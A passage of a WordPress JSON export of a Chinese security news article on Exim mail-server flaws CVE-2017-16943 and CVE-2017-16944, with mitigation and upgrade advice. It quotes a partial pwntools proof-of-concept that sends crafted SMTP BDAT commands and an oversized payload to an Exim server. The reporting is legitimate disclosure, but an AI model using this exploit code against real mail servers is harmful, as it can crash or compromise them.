\u8c03\u67e5\u663e\u793a\uff0c\u8be5\u6f0f\u6d1e\u7ecf\u7531\u516c\u5171 bug \u8ddf\u8e2a\u5668\u88ab\u53d1\u73b0\uff0c\u5e76\u5728\u8865\u4e01\u53d1\u5e03\u4e4b\u524d\u610f\u5916\u62ab\u9732\u3002\u4e00\u65e6\u88ab\u9ed1\u5ba2\u6076\u610f\u5229\u7528\uff0c\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u5c06\u4f1a\u5d29\u6e83\uff0c\u56e0\u4e3a\u51fd\u6570\u6307\u9488 receive_getc \u5e76\u672a\u88ab\u91cd\u7f6e\u3002\u4ee5\u4e0b\u662f\u8be5\u6f0f\u6d1e\u7684\u90e8\u5206\u6982\u5ff5\u9a8c\u8bc1\u4ee3\u7801\uff08PoC\uff09\uff1a<\/p>\n
\n# pip install pwntools
from pwn import *<\/p>\n
r = remote(\u2018localhost\u2019, 25)<\/p>\n
r.recvline()
r.sendline(\u201cEHLO test\u201d)
r.recvuntil(\u201c250 HELP\u201d)
r.sendline(\u201cMAIL FROM:<[email protected]>\u201d)
r.recvline()
r.sendline(\u201cRCPT TO:<[email protected]>\u201d)
r.recvline()
#raw_input()
r.sendline(\u2018a\u2019*0x1100+\u2019\/x7f\u2019)
#raw_input()
r.recvuntil(\u2018command\u2019)
r.sendline(\u2018BDAT 1\u2019)
r.sendline(\u2018:BDAT \/x7f\u2019)
s = \u2018a\u2019*6 + p64(0xdeadbeef)*(0x1e00\/8)
r.send(s+ \u2018:\/r\/n\u2019)
r.recvuntil(\u2018command\u2019)
#raw_input()
r.send(\u2018\/n\u2019)
r.interactive()
exit()<\/p>\n<\/blockquote>\n
\u867d\u7136\u8ddf\u8e2a\u5668\u4f1a\u8b66\u793a Exim \u8f6f\u4ef6\u5b58\u5728\u6f0f\u6d1e\uff0c\u4f46\u6839\u636e\u7528\u6237\u4e60\u60ef\u6765\u770b\u544a\u8b66\u901a\u77e5\u6781\u6709\u53ef\u80fd\u88ab\u5ffd\u7565\u3002\u4e0d\u8fc7\uff0c\u73b0\u5f00\u53d1\u4eba\u5458\u5df2\u91c7\u53d6\u5b89\u5168\u63aa\u65bd\u9632\u6b62\u6b64\u7c7b\u4e8b\u4ef6\u6076\u610f\u53d1\u5c55\uff0c\u5e76\u63d0\u9192\u8fd0\u884c Exim 4.88 \u6216\u66f4\u9ad8\u7248\u672c\u7684\u7528\u6237\u5c06\u5176\u4e3b\u8981\u914d\u7f6e\u53c2\u6570 chunking_advertise_hosts \u8bbe\u7f6e\u4e3a\u7a7a\u503c\uff0c\u4ece\u800c\u7981\u7528 ESMTP \u7684 CHUNKING \u6269\u5c55\u3001\u4f7f BDAT \u547d\u4ee4\u65e0\u6cd5\u4f7f\u7528\uff0c\u4ee5\u4fbf\u5173\u95ed\u6613\u53d7\u653b\u51fb\u7684\u4ee3\u7801\u8def\u5f84\u3002\u8fd9\u53ea\u662f\u4e34\u65f6\u7f13\u89e3\u63aa\u65bd\uff0c\u5f7b\u5e95\u4fee\u590d\u4ecd\u9700\u5347\u7ea7\u5230\u5df2\u4fee\u8865\u7684\u7248\u672c\u3002<\/p>\n
\u53e6\u5916\uff0c\u7814\u7a76\u4eba\u5458\u53d1\u73b0\u7684\u53e6\u4e00\u4e2a\u6f0f\u6d1e\uff08CVE-2017-16944<\/strong>\uff09\u80fd\u591f\u5141\u8bb8\u9ed1\u5ba2\u5229\u7528 BDAT \u547d\u4ee4\u4e0e\u6076\u610f\u51fd\u6570\u8fdc\u7a0b\u5f00\u5c55\u62d2\u7edd\u670d\u52a1\uff08DoS\uff09\u653b\u51fb\u3002\u8be5\u6f0f\u6d1e\u5f71\u54cd\u4e86 Exim 4.88 \u548c 4.89 \u4e2d\u7684 SMTP \u540e\u53f0\u8fdb\u7a0b\u3002\u5bf9\u6b64\uff0c\u7814\u7a76\u4eba\u5458\u5efa\u8bae\u7cfb\u7edf\u7ba1\u7406\u4eba\u5458\u5c3d\u5feb\u66f4\u65b0\u81f3 Exim 4.90 \u7248\u672c<\/strong>\uff0c\u4ee5\u9632\u53ef\u80fd\u7684\u9ed1\u5ba2\u6076\u610f\u653b\u51fb\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"\u53f0\u6e7e\u5b89\u5168\u516c\u53f8 DEVCORE \u7684\u7814\u7a76\u4eba\u5458 Meh \u4e8e\u8fd1\u671f\u53d1\u73b0\u4e92\u8054\u7f51\u90ae\u4ef6\u4f20\u8f93\u4ee3\u7406\uff08MTA\uff09\u8f6f\u4ef6 Exim \u5b58\u5728\u4e00\u5904\u5173\u952e\u6f0f\u6d1e\uff08CVE-2017-16943\uff09\uff0c\u5141\u8bb8\u9ed1\u5ba2\u5411 SMTP 
\u670d\u52a1\u2026<\/p>\n","protected":false},"author":2,"featured_media":1128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[147],"tags":[115,57],"special":[],"class_list":["post-1127","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-market","tag-cgo","tag-57","entry"],"views":83357,"_links":{"self":[{"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/posts\/1127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/comments?post=1127"}],"version-history":[{"count":0,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/posts\/1127\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/media\/1128"}],"wp:attachment":[{"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/media?parent=1127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/categories?post=1127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/tags?post=1127"},{"taxonomy":"special","embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/special?post=1127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}